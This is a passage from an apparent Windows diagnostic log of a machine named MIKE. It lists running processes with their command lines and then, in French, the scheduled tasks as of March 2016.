                     UserServerDllInitialization,3 ServerDll=winsrv:ConSe
                     rverDllInitialization,2 ServerDll=sxssrv,4 ProfileCo
                     ntrol=Off MaxRequestThreads=16
    ExecutablePath : C:\Windows\system32\csrss.exe
    
    ProcessID      : 648
    ProcessName    : services.exe
    Handle         : 648
    commandline    : C:\Windows\system32\services.exe
    ExecutablePath : C:\Windows\system32\services.exe
    
    ProcessID      : 684
    ProcessName    : winlogon.exe
    Handle         : 684
    commandline    : winlogon.exe
    ExecutablePath : C:\Windows\system32\winlogon.exe
    
    ProcessID      : 696
    ProcessName    : lsass.exe
    Handle         : 696
    commandline    : C:\Windows\system32\lsass.exe
    ExecutablePath : C:\Windows\system32\lsass.exe
    
    ProcessID      : 704
    ProcessName    : lsm.exe
    Handle         : 704
    commandline    : C:\Windows\system32\lsm.exe
    ExecutablePath : C:\Windows\system32\lsm.exe
    
    ProcessID      : 812
    ProcessName    : svchost.exe
    Handle         : 812
    commandline    : C:\Windows\system32\svchost.exe -k DcomLaunch
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 872
    ProcessName    : nvvsvc.exe
    Handle         : 872
    commandline    : "C:\Windows\system32\nvvsvc.exe"
    ExecutablePath : C:\Windows\system32\nvvsvc.exe
    
    ProcessID      : 912
    ProcessName    : svchost.exe
    Handle         : 912
    commandline    : C:\Windows\system32\svchost.exe -k RPCSS
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 984
    ProcessName    : MsMpEng.exe
    Handle         : 984
    commandline    : "C:\Program Files\Microsoft Security Client\MsMpEng.
                     exe"
    ExecutablePath : C:\Program Files\Microsoft Security Client\MsMpEng.e
                     xe
    
    ProcessID      : 384
    ProcessName    : svchost.exe
    Handle         : 384
    commandline    : C:\Windows\System32\svchost.exe -k LocalServiceNetwo
                     rkRestricted
    ExecutablePath : C:\Windows\System32\svchost.exe
    
    ProcessID      : 376
    ProcessName    : svchost.exe
    Handle         : 376
    commandline    : C:\Windows\System32\svchost.exe -k LocalSystemNetwor
                     kRestricted
    ExecutablePath : C:\Windows\System32\svchost.exe
    
    ProcessID      : 484
    ProcessName    : svchost.exe
    Handle         : 484
    commandline    : C:\Windows\system32\svchost.exe -k LocalService
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 528
    ProcessName    : svchost.exe
    Handle         : 528
    commandline    : C:\Windows\system32\svchost.exe -k netsvcs
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 1052
    ProcessName    : CTAudSvc.exe
    Handle         : 1052
    commandline    : "C:\Program Files (x86)\Creative\Shared Files\CTAudS
                     vc.exe"
    ExecutablePath : C:\Program Files (x86)\Creative\Shared Files\CTAudSv
                     c.exe
    
    ProcessID      : 1092
    ProcessName    : svchost.exe
    Handle         : 1092
    commandline    : C:\Windows\system32\svchost.exe -k GPSvcGroup
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 1304
    ProcessName    : svchost.exe
    Handle         : 1304
    commandline    : C:\Windows\system32\svchost.exe -k NetworkService
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 1448
    ProcessName    : NvXDSync.exe
    Handle         : 1448
    commandline    : "C:\Program Files\NVIDIA Corporation\Display\nvxdsyn
                     c.exe"
    ExecutablePath : C:\Program Files\NVIDIA Corporation\Display\nvxdsync
                     .exe
    
    ProcessID      : 1456
    ProcessName    : nvvsvc.exe
    Handle         : 1456
    commandline    : C:\Windows\system32\nvvsvc.exe -session -first
    ExecutablePath : C:\Windows\system32\nvvsvc.exe
    
    ProcessID      : 1580
    ProcessName    : spoolsv.exe
    Handle         : 1580
    commandline    : C:\Windows\System32\spoolsv.exe
    ExecutablePath : C:\Windows\System32\spoolsv.exe
    
    ProcessID      : 1044
    ProcessName    : armsvc.exe
    Handle         : 1044
    commandline    : "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\a
                     rmsvc.exe"
    ExecutablePath : C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\ar
                     msvc.exe
    
    ProcessID      : 1292
    ProcessName    : svchost.exe
    Handle         : 1292
    commandline    : C:\Windows\System32\svchost.exe -k utcsvc
    ExecutablePath : C:\Windows\System32\svchost.exe
    
    ProcessID      : 496
    ProcessName    : svchost.exe
    Handle         : 496
    commandline    : C:\Windows\System32\svchost.exe -k LocalServiceNoNet
                     work
    ExecutablePath : C:\Windows\System32\svchost.exe
    
    ProcessID      : 1696
    ProcessName    : svchost.exe
    Handle         : 1696
    commandline    : C:\Windows\system32\svchost.exe -k LocalServiceAndNo
                     Impersonation
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 2060
    ProcessName    : svchost.exe
    Handle         : 2060
    commandline    : C:\Windows\system32\svchost.exe -k imgsvc
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 2124
    ProcessName    : vmnat.exe
    Handle         : 2124
    commandline    : C:\WINDOWS\SYSWOW64\VMNAT.EXE
    ExecutablePath : C:\WINDOWS\SYSWOW64\VMNAT.EXE
    
    ProcessID      : 2228
    ProcessName    : WLIDSVC.EXE
    Handle         : 2228
    commandline    : "C:\Program Files\Common Files\Microsoft Shared\Wind
                     ows Live\WLIDSVC.EXE"
    ExecutablePath : C:\Program Files\Common Files\Microsoft Shared\Windo
                     ws Live\WLIDSVC.EXE
    
    ProcessID      : 2296
    ProcessName    : vmware-authd.exe
    Handle         : 2296
    commandline    : "c:\Program Files (x86)\VMware\VMware Workstation\vm
                     ware-authd.exe"
    ExecutablePath : c:\Program Files (x86)\VMware\VMware Workstation\vmw
                     are-authd.exe
    
    ProcessID      : 2316
    ProcessName    : WLIDSVCM.EXE
    Handle         : 2316
    commandline    : WLIDSvcM.exe 2228
    ExecutablePath : C:\Program Files\Common Files\Microsoft Shared\Windo
                     ws Live\WLIDSvcM.exe
    
    ProcessID      : 2372
    ProcessName    : vmnetdhcp.exe
    Handle         : 2372
    commandline    : C:\WINDOWS\SYSWOW64\VMNETDHCP.EXE
    ExecutablePath : C:\WINDOWS\SYSWOW64\VMNETDHCP.EXE
    
    ProcessID      : 2392
    ProcessName    : vmware-usbarbitrator64.exe
    Handle         : 2392
    commandline    : "c:\Program Files (x86)\Common Files\VMware\USB\vmwa
                     re-usbarbitrator64.exe"
    ExecutablePath : c:\Program Files (x86)\Common Files\VMware\USB\vmwar
                     e-usbarbitrator64.exe
    
    ProcessID      : 2916
    ProcessName    : svchost.exe
    Handle         : 2916
    commandline    : C:\Windows\system32\svchost.exe -k WindowsMobile
    ExecutablePath : C:\Windows\system32\svchost.exe
    
    ProcessID      : 2512
    ProcessName    : TrustedInstaller.exe
    Handle         : 2512
    commandline    : C:\Windows\servicing\TrustedInstaller.exe
    ExecutablePath : C:\Windows\servicing\TrustedInstaller.exe
    
    ProcessID      : 2644
    ProcessName    : WmiPrvSE.exe
    Handle         : 2644
    commandline    : C:\Windows\system32\wbem\wmiprvse.exe
    ExecutablePath : C:\Windows\system32\wbem\wmiprvse.exe
    
    ProcessID      : 2924
    ProcessName    : taskhost.exe
    Handle         : 2924
    commandline    : "taskhost.exe"
    ExecutablePath : C:\Windows\system32\taskhost.exe
    
    ProcessID      : 2888
    ProcessName    : dwm.exe
    Handle         : 2888
    commandline    : "C:\Windows\system32\Dwm.exe"
    ExecutablePath : C:\Windows\system32\Dwm.exe
    
    ProcessID      : 1068
    ProcessName    : explorer.exe
    Handle         : 1068
    commandline    : C:\Windows\Explorer.EXE
    ExecutablePath : C:\Windows\Explorer.EXE
    
    ProcessID      : 2540
    ProcessName    : msseces.exe
    Handle         : 2540
    commandline    : "C:\Program Files\Microsoft Security Client\msseces.
                     exe" -hide -runkey
    ExecutablePath : C:\Program Files\Microsoft Security Client\msseces.e
                     xe
    
    ProcessID      : 3404
    ProcessName    : Ctxfihlp.exe
    Handle         : 3404
    commandline    : "C:\Windows\System32\Ctxfihlp.exe" 
    ExecutablePath : C:\Windows\SysWOW64\Ctxfihlp.exe
    
    ProcessID      : 3576
    ProcessName    : CTxfispi.exe
    Handle         : 3576
    commandline    : "C:\Windows\SysWOW64\CTXFISPI.EXE" -Embedding
    ExecutablePath : C:\Windows\SysWOW64\CTXFISPI.EXE
    
    ProcessID      : 3908
    ProcessName    : TurboLaunch.exe
    Handle         : 3908
    commandline    : "C:\Program Files (x86)\TurboLaunch\TurboLaunch.exe"
                      
    ExecutablePath : C:\Program Files (x86)\TurboLaunch\TurboLaunch.exe
    
    ProcessID      : 2608
    ProcessName    : seamonkey.exe
    Handle         : 2608
    commandline    : "C:\Program Files (x86)\SeaMonkey\seamonkey.exe" 
    ExecutablePath : C:\Program Files (x86)\SeaMonkey\seamonkey.exe
    
    ProcessID      : 1260
    ProcessName    : OSPPSVC.EXE
    Handle         : 1260
    commandline    : "C:\Program Files\Common Files\Microsoft Shared\Offi
                     ceSoftwareProtectionPlatform\OSPPSVC.EXE"
    ExecutablePath : C:\Program Files\Common Files\Microsoft Shared\Offic
                     eSoftwareProtectionPlatform\OSPPSVC.EXE
    
    ProcessID      : 2192
    ProcessName    : audiodg.exe
    Handle         : 2192
    commandline    : 
    ExecutablePath : 
    
    ProcessID      : 4300
    ProcessName    : cmd.exe
    Handle         : 4300
    commandline    : "C:\Windows\system32\cmd.exe" 
    ExecutablePath : C:\Windows\system32\cmd.exe
    
    ProcessID      : 2576
    ProcessName    : conhost.exe
    Handle         : 2576
    commandline    : \??\C:\Windows\system32\conhost.exe "-1665522925-160
                     911630670364105822504457913646607551406277480-650906
                     936-344212905
    ExecutablePath : C:\Windows\system32\conhost.exe
    
    ProcessID      : 3572
    ProcessName    : WmiPrvSE.exe
    Handle         : 3572
    commandline    : C:\Windows\system32\wbem\wmiprvse.exe
    ExecutablePath : C:\Windows\system32\wbem\wmiprvse.exe
    
    ProcessID      : 4324
    ProcessName    : powershell.exe
    Handle         : 4324
    commandline    : powershell.exe  Get-WmiObject Win32_Process | select
                      ProcessID,ProcessName,Handle,commandline,Executable
                     Path | Out-File -Append TmpLogkey.txt -Encoding asci
                     i
    ExecutablePath : C:\Windows\System32\WindowsPowerShell\v1.0\powershel
                     l.exe
    
    
    
    
    ******************************************************************************
                               Scheduled task list
    ******************************************************************************
    
    Dossier : \
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Adobe Acrobat Update Task
    Prochaine exécution:         N/A
    Statut:                      Inconnue
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \CreateChoiceProcessTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactive uniquement
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \DropboxUpdateTaskMachineCore
    Prochaine exécution:         30/03/2016 08:16:00
    Statut:                      Non démarrée
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \DropboxUpdateTaskMachineCore
    Prochaine exécution:         30/03/2016 08:16:00
    Statut:                      Non démarrée
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \DropboxUpdateTaskMachineUA
    Prochaine exécution:         29/03/2016 11:16:00
    Statut:                      Non démarrée
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \GoogleUpdateTaskMachineCore
    Prochaine exécution:         29/03/2016 17:31:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \GoogleUpdateTaskMachineCore
    Prochaine exécution:         29/03/2016 17:31:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \GoogleUpdateTaskMachineUA
    Prochaine exécution:         29/03/2016 10:31:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \GoogleUpdateTaskUserS-1-5-21-4027148100-3405918830-622884426-1000Core
    Prochaine exécution:         30/03/2016 08:42:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactive uniquement
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \GoogleUpdateTaskUserS-1-5-21-4027148100-3405918830-622884426-1000UA
    Prochaine exécution:         29/03/2016 10:42:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactive uniquement
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \SamsungMagician
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactive uniquement
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \{F82B9069-6082-474D-80F5-182AD88183C6}
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactive uniquement
    
    Dossier : \Apple
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Apple\AppleSoftwareUpdate
    Prochaine exécution:         21/04/2016 18:12:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \ASUS
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \ASUS\ASUS RegRun Loader
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft
    INFORMATION : aucune tâche planifiée n'est actuellement disponible à votre niveau d'accès.
    
    Dossier : \Microsoft\Microsoft Antimalware
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan
    Prochaine exécution:         29/03/2016 11:45:21
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows
    INFORMATION : aucune tâche planifiée n'est actuellement disponible à votre niveau d'accès.
    
    Dossier : \Microsoft\Windows\Active Directory Rights Management Services Client
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\AppID
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\AppID\PolicyConverter
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Application Experience
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Application Experience\AitAgent
    Prochaine exécution:         30/03/2016 02:30:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser
    Prochaine exécution:         30/03/2016 04:49:43
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Application Experience\ProgramDataUpdater
    Prochaine exécution:         30/03/2016 00:58:47
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Autochk
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Autochk\Proxy
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Bluetooth
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Bluetooth\UninstallDeviceTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\CertificateServicesClient
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\SystemTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\SystemTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\SystemTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\UserTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\UserTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\UserTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\UserTask-Roam
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\CertificateServicesClient\UserTask-Roam
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Customer Experience Improvement Program
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Customer Experience Improvement Program\Consolidator
    Prochaine exécution:         29/03/2016 13:00:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
    Prochaine exécution:         31/03/2016 03:30:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Customer Experience Improvement Program\Uploader
    Prochaine exécution:         N/A
    Statut:                      Non démarrée
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
    Prochaine exécution:         01/04/2016 01:30:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Defrag
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Defrag\ScheduledDefrag
    Prochaine exécution:         30/03/2016 02:54:37
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Diagnosis
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Diagnosis\Scheduled
    Prochaine exécution:         03/04/2016 01:00:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\DiskDiagnostic
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Location
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Location\Notifications
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Maintenance
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Maintenance\WinSAT
    Prochaine exécution:         03/04/2016 01:00:00
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\MemoryDiagnostic
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\MemoryDiagnostic\CorruptionDetector
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\MobilePC
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\MobilePC\HotStart
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\MUI
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\MUI\LPRemove
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Multimedia
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Multimedia\SystemSoundsService
    Prochaine exécution:         N/A
    Statut:                      En cours
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\NetTrace
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\NetTrace\GatherNetworkInfo
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Offline Files
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Offline Files\Background Synchronization
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Offline Files\Logon Synchronization
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    ERREUR : impossible de charger la tâche : BackgroundConfigSurveyor
    Erreur : L'image de la tâche est endommagée ou a été manipulée.
    
    
    Dossier : \Microsoft\Windows\PerfTrack
    INFORMATION : aucune tâche planifiée n'est actuellement disponible à votre niveau d'accès.
    
    Dossier : \Microsoft\Windows\PLA
    INFORMATION : aucune tâche planifiée n'est actuellement disponible à votre niveau d'accès.
    
    Dossier : \Microsoft\Windows\Power Efficiency Diagnostics
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem
    Prochaine exécution:         12/04/2016 10:28:12
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\RAC
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\RAC\RacTask
    Prochaine exécution:         29/03/2016 11:05:36
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\RAC\RacTask
    Prochaine exécution:         29/03/2016 11:14:19
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Ras
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Ras\MobilityManager
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Registry
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Registry\RegIdleBackup
    Prochaine exécution:         08/04/2016 00:35:51
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\RemoteAssistance
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Setup
    INFORMATION : aucune tâche planifiée n'est actuellement disponible à votre niveau d'accès.
    
    Dossier : \Microsoft\Windows\Setup\gwx
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\gwx\launchtrayprocess
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\gwx\launchtrayprocess
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\gwx\refreshgwxconfig
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent
    Prochaine exécution:         30/03/2016 19:29:02
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent
    Prochaine exécution:         30/03/2016 00:29:28
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\gwx\refreshgwxcontent
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Setup\GWXTriggers
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\Logon-5d
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B
    Prochaine exécution:         30/03/2016 05:33:23
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Setup\GWXTriggers\Time-5d
    Prochaine exécution:         30/03/2016 16:59:25
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\Shell
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Shell\WindowsParentalControls
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\Shell\WindowsParentalControlsMigration
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Dossier : \Microsoft\Windows\SideShow
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\SideShow\AutoWake
    Prochaine exécution:         Désactivée
    Statut:                      
    Mode d'ouverture de session: Interactif /Arrière-plan
    
    Nom de l'hôte:               MIKE
    Nom de la tâche:             \Microsoft\Windows\SideShow\GadgetManager
    Prochaine exécution:         N/A
    Statut:                      Prêt
    Mode d'ouverture de session: Interactif /Arrière-plan
    
